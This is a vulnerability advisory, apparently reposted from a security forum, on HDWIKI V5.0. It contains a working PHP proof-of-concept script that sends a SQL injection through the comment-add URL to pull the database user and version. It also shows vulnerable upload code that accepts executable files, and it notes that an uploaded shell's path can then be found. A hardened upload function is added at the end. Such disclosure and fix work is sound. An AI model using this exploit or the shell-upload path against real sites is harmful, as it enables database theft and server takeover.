HDWIKI V5.0 performs essentially no filtering of input variables, so multiple SQL injection vulnerabilities exist.
Proof-of-concept injection code for the comment-posting location:
<?php
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
// Form body of an ordinary comment post; the injected value sits in the URL, not here.
$postdata = 'comment=ddddddddddd&c_class=0&re_id=0&anonymity=0&code=undefined';
echo $html = send($postdata);

function send($cmd) {
    global $host, $path;
    // The id in the comment-add action reaches the query unfiltered.
    $message  = "POST $path/index.php?comment-add-2,(select/**/concat(user(),0x5f,version(),1,1,1),(1 HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: " . $host . "\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: " . $host . "\r\n";
    $message .= "Content-Length: " . strlen($cmd) . "\r\n";
    $message .= "Connection: Close\r\n";
    $message .= "Cookie: kaiyuan_tip_date=2%2C11; hd_sid=OBIyML; hd_auth=bandwidth%2Be0Xofs%2BfBr4E%2Fj7Wh%bandwidth\r\n";
    $message .= $cmd;
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
    $resp = '';
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
    return $resp;
}

Executable File Upload Vulnerability
Upload code from attachment.php:
function douploadimg() {
    $imgname   = $_FILES['photofile']['name'];
    $extname   = file::extname($imgname);
    $destfile  = $_ENV['attachment']->makepath($extname);
    $arrupload = file::uploadfile($_FILES['photofile'], $destfile);
    ......

The functions involved:

// The extension is taken straight from the client-supplied file name.
function extname($filename) {
    $pathinfo = pathinfo($filename);
    return strtolower($pathinfo['extension']);
}

// The target path keeps whatever extension extname() returned.
function makepath($extname, $format = 'ym') {
    return 'uploads/' . gmdate($format, $this->base->time + $this->base->setting['time_offset']) . "/{$this->base->time}" . util::random(8) . '.' . strtolower($extname);
}

function uploadfile($attachment, $target, $maxsize = 1024, $is_image = 1) {
    $result = array('result' => false, 'msg' => 'upload mistake');
    if ($is_image) {
        $attach   = $attachment;
        $filesize = $attach['size'] / 1024;
        if (0 == $filesize) {
            $result['msg'] = '上传错误'; // "upload error"
            return $result;
        }
        // Only the client-supplied Content-Type of the upload part is checked;
        // the file extension is never validated.
        if (substr($attach['type'], 0, 6) != 'image/') {
            $result['msg'] = '格式错误'; // "format error"
            return $result;
        }
        if ($filesize > $maxsize) {
            $result['msg'] = '文件过大'; // "file too large"
            return $result;
        }
    } else {
        $attach['tmp_name'] = $attachment;
    }
    $filedir = dirname($target);
    file::forcemkdir($filedir);
    if (@copy($attach['tmp_name'], $target) || @move_uploaded_file($attach['tmp_name'], $target)) {
        $result['result'] = true;
        $result['msg']    = '上传成功'; // "upload success"
    }
    ......
}
After the upload, the address of the uploaded file (the shell) is visible in the image encyclopedia section.
From http://bbs.wolvez.org/viewtopic.php?id=208
www.2cto.com:
Code filtering for the above problems
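For comparison, an added hardened replacement for the image branch of uploadfile() (example code written here, not HDWIKI's): it ignores the client-supplied type, sniffs the real content with fileinfo, derives the extension from the detected type rather than the original file name, and stores the file under a random name. The function name safeUploadImage and the $uploadDir parameter are assumptions; the upload directory is further assumed to be served without PHP execution.

```php
<?php
// Added example, not HDWIKI code: a hardened image upload that does not
// trust $_FILES['type'] or the extension of the original file name.
function safeUploadImage(array $file, string $uploadDir, int $maxKb = 1024): array
{
    $fail = function (string $msg): array {
        return array('result' => false, 'msg' => $msg);
    };
    // Accept only files that really arrived through PHP's upload mechanism.
    if (!isset($file['tmp_name'], $file['error'])
        || $file['error'] !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return $fail('upload error');
    }
    // Size comes from the temp file on disk, not from the request.
    $size = filesize($file['tmp_name']);
    if ($size === false || $size === 0 || $size / 1024 > $maxKb) {
        return $fail('file empty or too large');
    }
    // Sniff the content; the part's Content-Type header is attacker-controlled.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    $allowed = array(
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
    );
    if (!isset($allowed[$mime]) || getimagesize($file['tmp_name']) === false) {
        return $fail('format error');
    }
    // The stored extension is fixed by the detected type, so a file named
    // "anything.php" with a forged image header still lands as .jpg/.png/.gif.
    $ext  = $allowed[$mime];
    $name = bin2hex(random_bytes(8)) . '.' . $ext;
    if (!is_dir($uploadDir) && !mkdir($uploadDir, 0755, true)) {
        return $fail('upload error');
    }
    $target = rtrim($uploadDir, '/') . '/' . $name;
    // move_uploaded_file() only, never a bare copy() of an arbitrary path.
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return $fail('upload error');
    }
    return array('result' => true, 'msg' => 'upload success', 'path' => $target);
}
```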